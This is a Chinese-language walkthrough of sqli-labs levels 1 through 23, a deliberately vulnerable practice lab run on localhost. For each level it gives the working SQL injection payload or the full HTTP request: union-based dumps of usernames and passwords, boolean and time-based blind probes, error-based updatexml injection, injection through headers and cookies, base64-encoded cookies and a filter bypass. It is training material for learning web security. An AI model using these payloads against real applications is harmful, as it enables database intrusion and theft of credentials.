sqli-labs Less-1~~~Less-23

Less-1

　　payload：'+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

　　第一关正规的字符型SQL注入，单引号报错，常规注入即可

Less-2

　  payload：+and+1=2+union+select+1,username,password+from+security.users+limit 0,1--+

　　第二关数字型SQL注入，直接跟payload即可，通过and 1=1 ，and 1=2发现注入点

Less-3

　　payload：')+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

　　第三关为小括号包裹的字符型注入，发现注入点之后使用payload即可

Less-4

　　payload：")+and+1=2+union+select+1,username,password+from+security.users+limit+0,1--+

　　第四关为小括号包裹的字符型注入

Less-5

　　payload1(探测长度，以database()为例)：'+and+(select+length(database())=8)--+

　　payload2(探测内容，以database()为例)：'+and+(select+mid(database(),1,1)='s')--+

　　布尔盲注脚本：https://www.cnblogs.com/Spec/p/10648793.html

　　此脚本只将数据库爆出，具体还需要自己更改。

Less-6

　　payload1(探测长度，以database()为例)："+and+(select+length(database())=8)--+

　　payload2(探测内容，以database()为例)："+and+(select+mid(database(),1,1)='s')--+

　　同第五关，脚本稍作更改也可使用

Less-7

　　payload1(探测长度，以database()为例)：'))+and+if((length(database())=8),sleep(3),1)--+

　　payload2(探测内容，以database()为例)：'))+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

　　时间盲注，通过if语句判断，争取则延时3秒，否则不延时。

Less-8

　　payload1(探测长度，以database()为例)：'+and+(select+length(database())=8)--+

　　payload2(探测内容，以database()为例)：'+and+(select+mid(database(),1,1)='s')--+

　　同第五关

Less-9

　　payload1(探测长度，以database()为例)：'+and+if((length(database())=8),sleep(3),1)--+

　　payload2(探测内容，以database()为例)：'+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

　　同第七关，单引号字符型延时盲注

Less-10

　　payload1(探测长度，以database()为例)："+and+if((length(database())=8),sleep(3),1)--+

　　payload2(探测内容，以database()为例)："+and+if((mid(database(),1,1)='s'),sleep(3),1)--+

Less-11

　　payload：

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

　　常规的post注入，万能密码等。

Less-12

　　payload：

POST /sqli-labs/Less-12/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-12/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

uname=admin&passwd=123") and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-13

　　poc：

POST /sqli-labs/Less-13/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-13/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

uname=admin&passwd=123') or (select length(database())=8)-- &submit=Submit

　　post类型的布尔盲注，密码处通过 or 来判断真假

Less-14

　　poc：

POST /sqli-labs/Less-14/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-14/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 67

uname=1&passwd=1" or (select length(database())=8)-- &submit=Submit

　　同第十三关

Less-15

　　payload：

POST /sqli-labs/Less-11/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-11/?id=1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79

uname=admin&passwd=123' and 1=2 union select username,password from security.users limit 0,1-- &submit=Submit

Less-16

　　poc：

POST /sqli-labs/Less-16/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-16/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 74

uname=admin&passwd=123") or (select length(database())=8)-- &submit=Submit

Less-17

　　poc：

POST /sqli-labs/Less-17/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-17/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

uname=secure&passwd=admin' and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- &submit=Submit

　　报错注入，之前一直用这个payload：

select count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a

　　但一直都不对，知道读源码才知道对长度进行了限制，所以使用这个payload：

updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

　　发现报错成功。

Less-18

　　poc：

POST /sqli-labs/Less-18/ HTTP/1.1
Host: localhost
User-Agent: ' or updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) or '
Accept-Language: en-US,en;q=0.5
Referer: http://localhost/sqli-labs/Less-18/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uname=admin&passwd=0&submit=Submit

　　看源码发现，是将User-Agent未过滤插入数据库中，此时构造报错注入：updatexml(1,concat(0x7e,(SELECT user()),0x7e),1)，从而产生sql  http头注入。

Less-19

　　poc：

POST /sqli-labs/Less-19/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: ' or updatexml(1,concat(0x7e,(select user()),0x7e),1) or '
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

uname=admin&passwd=0&submit=Submit

　　同第十八关一样，不过登录进去时发现会将referer输出，于是修改referer的值，报错成功。

Less-20

　　poc：

GET /sqli-labs/Less-20/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=admin' and 1=2 union select user(),version(),database()--+
Connection: close

　　cookie注入，当登录进去时，发现会将User-Anget，referer，cookie输出到页面中，然后刷新，抓包，替换cookie为payload即可。

Less-21

　　poc：

GET /sqli-labs/Less-21/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4nKSBhbmQgMT0yIHVuaW9uIHNlbGVjdCAxLHVzZXJuYW1lLHBhc3N3b3JkIGZyb20gc2VjdXJpdHkudXNlcnMgbGltaXQgMCwxIw==
Connection: close

　　payload使用base64编码，并且注入点使用单引号和小括号包裹 ')

　　payload： admin') and 1=2 union select 1,username,password from security.users limit 0,1#

Less-22

　　poc：

GET /sqli-labs/Less-22/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: uname=YWRtaW4iIGFuZCAxPTIgdW5pb24gc2VsZWN0IDEsdXNlcm5hbWUscGFzc3dvcmQgZnJvbSBzZWN1cml0eS51c2VycyBsaW1pdCAwLDEtLSA=
Connection: close

　　payload：admin" and 1=2 union select 1,username,password from security.users limit 0,1--

Less-23

　　payload： ' and '1'='2' union select '1',username,password from security.users limit 0,1;%00

　　多次尝试基本确定 # 与 -- 是被过滤掉了的，于是尝试新的注释方法： ;%00 于是注释成功。